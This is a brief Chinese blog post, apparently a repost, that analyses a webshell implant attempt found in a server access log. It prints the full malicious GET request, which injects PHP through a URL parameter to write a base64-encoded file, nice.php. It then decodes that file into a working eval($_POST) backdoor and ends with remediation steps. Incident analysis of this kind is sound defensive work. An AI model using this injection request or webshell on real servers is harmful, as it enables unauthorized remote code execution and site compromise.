首页 > 系统相关> > 记录一次Webshell后门植入

记录一次Webshell后门植入

2021-07-28 11:02:18 作者：互联网

后门语句：

[ 2021-07-21T02:56:30+08:00 ] 136.144.41.223 GET //index.php?m=--><?=file_put_contents('nice.php',base64_decode("

PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

bnQobWQ1KCJSaW5nbyIpKTsKPz4="));?>

解析：

#在指定文件下添加内容

file_put_contents()

#解码base64

base64_decode()

#要添加内容的文件

nice.php

#添加的内容

PD9waHAKY2xhc3MgeHsKICAgIHB1YmxpYyBmdW5jdGlvbiBpcCgpewogICAgICAgICRjPSAiICRfUE9TVFtuaWNlXSI7C

iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIgPSAkYyAtPiBpcCgpOwpldmFsKCRiKTsKcHJp

bnQobWQ1KCJSaW5nbyIpKTsKPz4=

#解码后的添加内容

<?php
　　class x{
　　　　public function ip(){
　　　　　　$c= " $_POST[nice]";
　　　　　　return $c;
　　　　}
　　}
　　$c = new x();
　　$b = $c -> ip();
　　eval($b);
　　print(md5("Ringo"));
?>

大概意思就是在nice.php文件中添加上方代码

处理方案：

扫出nice.php文件替换或者删除

屏蔽eval()函数

标签：Webshell,植入,文件,ip,添加,iAgICAgICAgcmV0dXJuICRjOwogICAgfQp9CiRjID0gbmV3IHgoKTsKJGIg
来源： https://www.cnblogs.com/caopeng/p/15069423.html